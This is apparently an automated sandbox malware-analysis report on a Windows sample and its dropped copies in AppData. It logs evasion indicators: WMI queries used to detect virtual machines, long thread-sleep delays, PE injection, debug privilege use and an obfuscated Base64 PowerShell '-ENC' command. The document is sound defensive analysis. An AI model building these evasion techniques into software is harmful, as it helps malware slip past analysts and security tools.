                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\file.exe TID: 5084Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 3848Thread sleep count: 9732 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 4688Thread sleep count: 9481 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199875s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199624s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199498s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199344s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199203s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1199047s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198938s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198794s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198680s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198420s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198297s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198170s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1198031s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197921s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197671s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197536s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197391s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197265s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1197152s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196956s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196679s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196250s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1196094s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195921s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195809s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195688s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195436s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195328s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195200s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1195076s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194953s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194844s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194734s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194625s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194515s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194406s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194297s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194187s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194077s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193969s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193844s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193733s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193623s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep count: 36 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6020Thread sleep count: 9624 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep count: 43 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984Thread sleep count: 9758 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep count: 40 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 5388Thread sleep count: 9746 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1668Thread sleep count: 9716 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 836Thread sleep count: 844 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199662s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199537s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199405s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199200s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198760s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198310s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197900s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197786s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197349s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196761s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196005s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195758s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195505s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194897s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194753s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194348s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9732
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9388
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9481
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9624
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9746
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8218
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9716
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9319
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 844
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8j
                Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.609344708.00000000010AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Encrypted powershell cmdline option found
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeMemory written: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
